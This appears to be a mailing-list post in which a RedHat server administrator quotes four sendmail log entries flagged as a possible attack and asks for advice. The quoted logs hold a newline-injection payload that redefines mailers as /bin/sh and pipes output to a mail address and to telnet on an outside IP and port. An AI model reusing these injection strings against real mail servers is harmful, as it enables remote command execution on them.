I've got four
entries in my maillog which I've never seen before and which
look terrifying. This is on my non-Cobalt server (RedHat) so I don't know if it's of relevance to this list. If not, apologies - but I'd be grateful for suggestions as to good lists to try, hopefully with people as helpful as on this one. Dec 22 15:16:56 ns sendmail[9835]: NOQUEUE: POSSIBLE ATTACK from ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M R<"|/... Vulnerable | mail jimmy@xxxxxxxxxxxxxxxxx">^M R<"|( sleep 2 ; echo quit ) |telnet 203.87.15.193 5701" Dec 22 15:16:56 ns sendmail[9836]: NOQUEUE: POSSIBLE ATTACK from ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M R<"|/... Vulnerable | mail jimmy@xxxxxxxxxxxxxxxxx">^M R<"|( sleep 2 ; echo quit ) |telnet 203.87.15.193 5701" Dec 22 15:16:57 ns sendmail[9837]: NOQUEUE: issCrootMprogP/bin/shFlsDFMeuAsh-c$uMlocalP/bin/shFlsDFMeuAsh-c$uR|/bin/echo SendmailIdentdBugVulnera: VRFY 1145130318@ISS Dec 22 15:16:57 ns sendmail[9838]: NOQUEUE: issCrootMprogP/bin/shFlsDFMeuAsh-c$uMlocalP/bin/shFlsDFMeuAsh-c$uR|/bin/echo SendmailIdentdBugVulnera: VRFY 1145130318@ISS -- Eddie Bishop |